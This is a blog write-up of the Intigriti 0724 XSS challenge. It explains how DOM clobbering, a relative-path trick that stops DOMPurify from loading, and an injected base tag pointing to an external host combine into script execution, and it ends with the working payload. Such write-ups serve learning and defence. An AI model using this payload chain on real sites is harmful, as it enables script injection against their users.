<!DOCTYPE html>
<html lang="en" itemscope itemtype="http://schema.org/WebPage">
  <head>
    

  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">

 


      <title>Intigriti 0724 XSS Challenge - Alfin&#39;s Notes</title>

  <meta name="description" content="tl;dr

Dom clobbering to clobber isDevelopmet
Throwing an error using RPO to prevent Dompurify from loading
Using base tag&rsquo;s to import our evil.js
">
  <meta name="author" content="Alfin Joseph"/><script type="application/ld+json">
{
    "@context": "http://schema.org",
    "@type": "WebSite",
    "name": "Alfins Notes",
    
    "url": "https:\/\/Alfinj0se.github.io\/"
}
</script><script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "Organization",
  "name": "",
  "url": "https:\/\/Alfinj0se.github.io\/"
  
  
  
  
}
</script>
<script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "BreadcrumbList",
  "itemListElement": [{
        "@type": "ListItem",
        "position": 1,
        "item": {
          "@id": "https:\/\/Alfinj0se.github.io\/",
          "name": "home"
        }
    },{
        "@type": "ListItem",
        "position": 3,
        "item": {
          "@id": "https:\/\/Alfinj0se.github.io\/posts\/intigritixssjuly2024\/",
          "name": "Intigriti 0724 xss challenge"
        }
    }]
}
</script><script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "Article",
  "author": {
    "name" : "Alfin Joseph"
  },
  "headline": "Intigriti 0724 XSS Challenge",
  "description" : "tl;dr\nDom clobbering to clobber isDevelopmet Throwing an error using RPO to prevent Dompurify from loading Using base tag\u0026rsquo;s to import our evil.js ",
  "inLanguage" : "en",
  "wordCount":  653 ,
  "datePublished" : "2024-07-04T21:00:26\u002b05:30",
  "dateModified" : "2024-07-04T21:00:26\u002b05:30",
  "image" : "https:\/\/Alfinj0se.github.io\/img\/pfp.jpg",
  "keywords" : [ "writeups" ],
  "mainEntityOfPage" : "https:\/\/Alfinj0se.github.io\/posts\/intigritixssjuly2024\/",
  "publisher" : {
    "@type": "Organization",
    "name" : "https:\/\/Alfinj0se.github.io\/",
    "logo" : {
        "@type" : "ImageObject",
        "url" : "https:\/\/Alfinj0se.github.io\/img\/pfp.jpg",
        "height" :  60 ,
        "width" :  60
    }
  }
}
</script>


<meta property="og:title" content="Intigriti 0724 XSS Challenge" />
<meta property="og:description" content="tl;dr

Dom clobbering to clobber isDevelopmet
Throwing an error using RPO to prevent Dompurify from loading
Using base tag&rsquo;s to import our evil.js
">
<meta property="og:image" content="https://Alfinj0se.github.io/img/pfp.jpg" />
<meta property="og:url" content="https://Alfinj0se.github.io/posts/intigritixssjuly2024/" />
<meta property="og:type" content="website" />
<meta property="og:site_name" content="Alfins Notes" />

  <meta name="twitter:title" content="Intigriti 0724 XSS Challenge" />
  <meta name="twitter:description" content="tl;dr

Dom clobbering to clobber isDevelopmet
Throwing an error using RPO to prevent Dompurify from loading
Using base tag&rsquo;s to import our evil.js
">
  <meta name="twitter:image" content="https://Alfinj0se.github.io/img/pfp.jpg" />
  <meta name="twitter:card" content="summary_large_image" />
  <meta name="twitter:site" content="@Alfinjoseph19" />
  <meta name="twitter:creator" content="@Alfinjoseph19" />
  <link href='https://Alfinj0se.github.io/img/favicon.ico' rel='icon' type='image/x-icon'/>
  <meta name="generator" content="Hugo 0.126.1">
  <link rel="alternate" href="https://Alfinj0se.github.io/index.xml" type="application/rss+xml" title="Alfins Notes"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.16.7/dist/katex.min.css" integrity="sha384-3UiQGuEI4TTMaFmGIZumfRPtfKQ3trwQE2JgosJxCnGmQpL/lJdjpcHkaaFwHlcI" crossorigin="anonymous">
  <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.5.0/css/all.css" integrity="sha384-B4dIYHKNBt8Bc12p+WXckhzcICo0wtJAoU8YZTY5qE0Id1GSseTk6S+L3BlXeVIU" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@3.4.1/dist/css/bootstrap.min.css" integrity="sha384-HSMxcRTRxnN+Bdg0JdbxYKrThecOKuH5zCYotlSAcp1+c8xmyTe9GYg1l9a69psu" crossorigin="anonymous"><link rel="stylesheet" href="https://Alfinj0se.github.io/css/main.css" /><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" />
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" /><link rel="stylesheet" href="https://Alfinj0se.github.io/css/syntax.css" /><link rel="stylesheet" href="https://Alfinj0se.github.io/css/codeblock.css" /><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/photoswipe/4.1.2/photoswipe.min.css" integrity="sha384-h/L2W9KefUClHWaty3SLE5F/qvc4djlyR4qY3NUV5HGQBBW7stbcfff1+I/vmsHh" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/photoswipe/4.1.2/default-skin/default-skin.min.css" integrity="sha384-iD0dNku6PYSIQLyfTOpB06F2KCZJAKLOThS5HRe8b3ibhdEQ6eKsFf/EeFxdOt5R" crossorigin="anonymous">

  


  </head>
  <body>
    <nav class="navbar navbar-default navbar-fixed-top navbar-custom">
  <div class="container-fluid">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#main-navbar">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="https://Alfinj0se.github.io/">Alfins Notes</a>
    </div>

    <div class="collapse navbar-collapse" id="main-navbar">
      <ul class="nav navbar-nav navbar-right">
        
          
            <li>
              <a title="Blog" href="/">Blog</a>
            </li>
          
        
          
            <li>
              <a title="About" href="/page/about/">About</a>
            </li>
          
        

        

        
      </ul>
    </div>

    
      <div class="avatar-container">
        <div class="avatar-img-border">
          <a title="Alfins Notes" href="https://Alfinj0se.github.io/">
            <img class="avatar-img" src="https://Alfinj0se.github.io/img/pfp.jpg" alt="Alfins Notes" />
          </a>
        </div>
      </div>
    

  </div>
</nav>




    


<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

<div class="pswp__bg"></div>

<div class="pswp__scroll-wrap">
    
    <div class="pswp__container">
      <div class="pswp__item"></div>
      <div class="pswp__item"></div>
      <div class="pswp__item"></div>
    </div>
    
    <div class="pswp__ui pswp__ui--hidden">
    <div class="pswp__top-bar">
      
      <div class="pswp__counter"></div>
      <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
      <button class="pswp__button pswp__button--share" title="Share"></button>
      <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
      <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
      
      
      <div class="pswp__preloader">
        <div class="pswp__preloader__icn">
          <div class="pswp__preloader__cut">
            <div class="pswp__preloader__donut"></div>
          </div>
        </div>
      </div>
    </div>
    <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
      <div class="pswp__share-tooltip"></div>
    </div>
    <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
    </button>
    <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
    </button>
    <div class="pswp__caption">
      <div class="pswp__caption__center"></div>
    </div>
    </div>
    </div>
</div>


  
  
  






  

  <header class="header-section ">
    
    
    <div class="intro-header no-img">
      <div class="container">
        <div class="row">
          <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
            <div class="posts-heading">
              
                <h1>Intigriti 0724 XSS Challenge</h1>
              
              
                <hr class="small">
              
              
              
            </div>
          </div>
        </div>
      </div>
    </div>
  
  </header>


    
<div class="container" role="main">
  <div class="row">
    <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
      <article role="main" class="blog-post">
        <p><strong>tl;dr</strong></p>
<ul>
<li>Dom clobbering to clobber isDevelopmet</li>
<li>Throwing an error using RPO to prevent Dompurify from loading</li>
<li>Using base tag&rsquo;s to import our evil.js</li>
</ul>
<h2 id="-initial-analysis">🔎 Initial analysis</h2>
<p>We are given a memo sharing application , and its seems like we html injection using the memo parameter. Looking at the client-side code for the application.</p>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 1
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 2
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 3
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 4
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 5
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 6
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 7
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 8
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 9
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">10
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">11
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">12
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">13
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">14
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">15
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">16
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">17
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">18
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">19
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">20
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">21
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">22
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">23
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">24
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">25
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">26
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">27
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">28
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">29
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">30
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">31
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">32
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>&lt;<span style="color:#ff6ac1">script</span> <span style="color:#57c7ff">integrity</span><span style="color:#ff6ac1">=</span><span style="color:#5af78e">&#34;sha256-C1icWYRx+IVzgDTZEphr2d/cs/v0sM76a7AX4LdalSo=&#34;</span>&gt;
</span></span><span style="display:flex;"><span>      <span style="color:#ff5c57">document</span>.getElementById(<span style="color:#5af78e">&#34;memoForm&#34;</span>).addEventListener(<span style="color:#5af78e">&#34;submit&#34;</span>, (event) =&gt; {
</span></span><span style="display:flex;"><span>        event.preventDefault();
</span></span><span style="display:flex;"><span>        <span style="color:#ff6ac1">const</span> memoContent <span style="color:#ff6ac1">=</span> <span style="color:#ff5c57">document</span>.getElementById(<span style="color:#5af78e">&#34;memoContentInput&#34;</span>).value;
</span></span><span style="display:flex;"><span>        <span style="color:#ff5c57">window</span>.location.href <span style="color:#ff6ac1">=</span> <span style="color:#5af78e">`</span><span style="color:#5af78e">${</span><span style="color:#ff5c57">window</span>.location.href.split(<span style="color:#5af78e">&#34;?&#34;</span>)[<span style="color:#ff9f43">0</span>]<span style="color:#5af78e">}</span><span style="color:#5af78e">?memo=</span><span style="color:#5af78e">${</span><span style="color:#ff5c57">encodeURIComponent</span>(
</span></span><span style="display:flex;"><span>          memoContent
</span></span><span style="display:flex;"><span>        )<span style="color:#5af78e">}</span><span style="color:#5af78e">`</span>;
</span></span><span style="display:flex;"><span>      });
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#ff6ac1">const</span> urlParams <span style="color:#ff6ac1">=</span> <span style="color:#ff6ac1">new</span> URLSearchParams(<span style="color:#ff5c57">window</span>.location.search);
</span></span><span style="display:flex;"><span>      <span style="color:#ff6ac1">const</span> sharedMemo <span style="color:#ff6ac1">=</span> urlParams.get(<span style="color:#5af78e">&#34;memo&#34;</span>);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#ff6ac1">if</span> (sharedMemo) {
</span></span><span style="display:flex;"><span>        <span style="color:#ff6ac1">const</span> displayElement <span style="color:#ff6ac1">=</span> <span style="color:#ff5c57">document</span>.getElementById(<span style="color:#5af78e">&#34;displayMemo&#34;</span>);
</span></span><span style="display:flex;"><span>        <span style="color:#78787e">//Don&#39;t worry about XSS, the CSP will protect us for now
</span></span></span><span style="display:flex;"><span><span style="color:#78787e"></span>        displayElement.innerHTML <span style="color:#ff6ac1">=</span> sharedMemo;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#ff6ac1">if</span> (origin <span style="color:#ff6ac1">===</span> <span style="color:#5af78e">&#34;http://localhost&#34;</span>) isDevelopment <span style="color:#ff6ac1">=</span> <span style="color:#ff6ac1">true</span>;
</span></span><span style="display:flex;"><span>        <span style="color:#ff6ac1">if</span> (isDevelopment) {
</span></span><span style="display:flex;"><span>          <span style="color:#78787e">//Testing XSS sanitization for next release
</span></span></span><span style="display:flex;"><span><span style="color:#78787e"></span>          <span style="color:#ff6ac1">try</span> {
</span></span><span style="display:flex;"><span>            <span style="color:#ff6ac1">const</span> sanitizedMemo <span style="color:#ff6ac1">=</span> DOMPurify.sanitize(sharedMemo);
</span></span><span style="display:flex;"><span>            displayElement.innerHTML <span style="color:#ff6ac1">=</span> sanitizedMemo;
</span></span><span style="display:flex;"><span>          } <span style="color:#ff6ac1">catch</span> (error) {
</span></span><span style="display:flex;"><span>            <span style="color:#ff6ac1">const</span> loggerScript <span style="color:#ff6ac1">=</span> <span style="color:#ff5c57">document</span>.createElement(<span style="color:#5af78e">&#34;script&#34;</span>);
</span></span><span style="display:flex;"><span>            loggerScript.src <span style="color:#ff6ac1">=</span> <span style="color:#5af78e">&#34;./logger.js&#34;</span>;
</span></span><span style="display:flex;"><span>            loggerScript.onload <span style="color:#ff6ac1">=</span> () =&gt; logError(error);
</span></span><span style="display:flex;"><span>            <span style="color:#ff5c57">document</span>.head.appendChild(loggerScript);
</span></span><span style="display:flex;"><span>          }
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    &lt;/<span style="color:#ff6ac1">script</span>&gt;
</span></span></code></pre></td></tr></table>
</div>
</div><p>as you can see our input HTML goes into an innerHTML sink in the beginning itself, however there is no easy XSS as there is a CSP.</p>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-js" data-lang="js"><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#ff6ac1">default</span><span style="color:#ff6ac1">-</span>src <span style="color:#ff6ac1">*</span>; script<span style="color:#ff6ac1">-</span>src <span style="color:#5af78e">&#39;strict-dynamic&#39;</span> <span style="color:#5af78e">&#39;sha256-bSjVkAbbcTI28KD1mUfs4dpQxuQ+V4WWUvdQWCI4iXw=&#39;</span> <span style="color:#5af78e">&#39;sha256-C1icWYRx+IVzgDTZEphr2d/cs/v0sM76a7AX4LdalSo=&#39;</span>;
</span></span></code></pre></td></tr></table>
</div>
</div><p>The csp doesnt seem too strict , the first thing that i thought of was that default src is * and there is no base uri directive in the csp .</p>
<p>So we can inject a base tag with our server as the href value which will make all the scripts with relative paths in the page load resources from our server.</p>
<p>However there is only one script being used in the page which is  dompurify.js and it is being loaded way before our injection happens so we cant make it load from our server using base tags.</p>
<p>However there is another script (logger.js) that is being loaded dynamically if certain conditions are satisfied. We can control the location from where logger.js is loaded using base tags as it is being loaded after our injection happens .</p>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 1
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 2
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 3
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 4
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 5
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 6
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 7
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 8
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 9
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">10
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">11
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">12
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">13
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-js" data-lang="js"><span style="display:flex;"><span><span style="color:#ff6ac1">if</span> (origin <span style="color:#ff6ac1">===</span> <span style="color:#5af78e">&#34;http://localhost&#34;</span>) isDevelopment <span style="color:#ff6ac1">=</span> <span style="color:#ff6ac1">true</span>;
</span></span><span style="display:flex;"><span>        <span style="color:#ff6ac1">if</span> (isDevelopment) {
</span></span><span style="display:flex;"><span>          <span style="color:#78787e">//Testing XSS sanitization for next release
</span></span></span><span style="display:flex;"><span><span style="color:#78787e"></span>          <span style="color:#ff6ac1">try</span> {
</span></span><span style="display:flex;"><span>            <span style="color:#ff6ac1">const</span> sanitizedMemo <span style="color:#ff6ac1">=</span> DOMPurify.sanitize(sharedMemo);
</span></span><span style="display:flex;"><span>            displayElement.innerHTML <span style="color:#ff6ac1">=</span> sanitizedMemo;
</span></span><span style="display:flex;"><span>          } <span style="color:#ff6ac1">catch</span> (error) {
</span></span><span style="display:flex;"><span>            <span style="color:#ff6ac1">const</span> loggerScript <span style="color:#ff6ac1">=</span> <span style="color:#ff5c57">document</span>.createElement(<span style="color:#5af78e">&#34;script&#34;</span>);
</span></span><span style="display:flex;"><span>            loggerScript.src <span style="color:#ff6ac1">=</span> <span style="color:#5af78e">&#34;./logger.js&#34;</span>;
</span></span><span style="display:flex;"><span>            loggerScript.onload <span style="color:#ff6ac1">=</span> () =&gt; logError(error);
</span></span><span style="display:flex;"><span>            <span style="color:#ff5c57">document</span>.head.appendChild(loggerScript);
</span></span><span style="display:flex;"><span>          }
</span></span><span style="display:flex;"><span>        }
</span></span></code></pre></td></tr></table>
</div>
</div><p>So to make logger.js load from our external server we have somehow reach the catch block. So for that to happen we need isDevelopment to be true, so that we can get inside the if block.</p>
<p>isDeveloment is only set to true if the origin is localhost.At the first glance it seems impossible to set isDevelopment as true.</p>
<p>However there are certain stuff you could to with just HTML injection!!</p>
<h2 id="-attack-plan">🥷 Attack plan</h2>
<p>So the attack plan is to use DOM clobbering here as we have HTML injection to define the isDevelopment variable. As isDevelopment is a global variable a simple tag with id attribute as isDevelopment will define that variable. Eg</p>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-js" data-lang="js"><span style="display:flex;"><span><span style="color:#ff6ac1">&lt;</span>a id<span style="color:#ff6ac1">=</span><span style="color:#5af78e">&#34;isDevelopment&#34;</span><span style="color:#ff6ac1">&gt;</span>,<span style="color:#ff6ac1">&lt;</span>div id<span style="color:#ff6ac1">=</span><span style="color:#5af78e">&#34;isdevelopment&#34;</span><span style="color:#ff6ac1">&gt;</span> etc 
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="causing-an-error-to-reach-the-catch-block-">Causing an Error to reach the catch block 🌟</h2>
<p>So now we are inside the if block , and to get to our logger.js script to load we have to get to the catch block . For that we have to cause an error somehow in these lines of code</p>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">4
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-js" data-lang="js"><span style="display:flex;"><span><span style="color:#ff6ac1">try</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#ff6ac1">const</span> sanitizedMemo <span style="color:#ff6ac1">=</span> DOMPurify.sanitize(sharedMemo);
</span></span><span style="display:flex;"><span>    displayElement.innerHTML <span style="color:#ff6ac1">=</span> sanitizedMemo;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></td></tr></table>
</div>
</div><p>If you look at the source code closely you can see that Dompurify is being loaded as a relative path. so if we access the page like /index.html/blah dompurify will try to get loaded from /blah .</p>
<p>So now that we are in the catch block we can use a base tag to load logger.js from our server.</p>
<h2 id="--final-payloads">🚀  Final Payloads</h2>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>&lt;<span style="color:#ff6ac1">a</span> <span style="color:#57c7ff">id</span><span style="color:#ff6ac1">=</span><span style="color:#5af78e">&#34;isDevelopment&#34;</span>&gt;asdf&lt;/<span style="color:#ff6ac1">a</span>&gt;&lt;<span style="color:#ff6ac1">base</span> <span style="color:#57c7ff">href</span><span style="color:#ff6ac1">=</span><span style="color:#5af78e">&#34;https://alfino.free.beeceptor.com/&#34;</span>&gt;
</span></span></code></pre></td></tr></table>
</div>
</div>

        
          <div class="blog-tags">
            
              <a href="https://Alfinj0se.github.io//tags/writeups/">writeups</a>&nbsp;
            
          </div>
        

        

        
          
            
          

          
                  <h4 class="see-also">See also</h4>
                  <ul>
                
                
                    <li><a href="/posts/intigritixssaug2024/">Intigriti 0824 XSS Challenge</a></li>
                
                    <li><a href="/posts/kitctf2024/">Flag Remover - KitCTF 2024</a></li>
                
                    <li><a href="/posts/mochactf-2024/">Mocha CTF 2024 Web Writeups</a></li>
                
                    <li><a href="/posts/angstromctf2024/">WaterMark as a Service AngstromCTF</a></li>
                
                    <li><a href="/posts/paaad-hackluctf2023/">päääd - Hack.lu CTF 2023 </a></li>
                
              </ul>

          
        
      </article>

      
        <ul class="pager blog-pager">
          
            <li class="previous">
              <a href="https://Alfinj0se.github.io/posts/kitctf2024/" data-toggle="tooltip" data-placement="top" title="Flag Remover - KitCTF 2024">&larr; Previous Post</a>
            </li>
          
          
            <li class="next">
              <a href="https://Alfinj0se.github.io/posts/intigritixssaug2024/" data-toggle="tooltip" data-placement="top" title="Intigriti 0824 XSS Challenge">Next Post &rarr;</a>
            </li>
          
        </ul>
      


      

    </div>
  </div>
</div>

      
<footer>
  <div class="container">
    
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <ul class="list-inline text-center footer-links">
          
              <li>
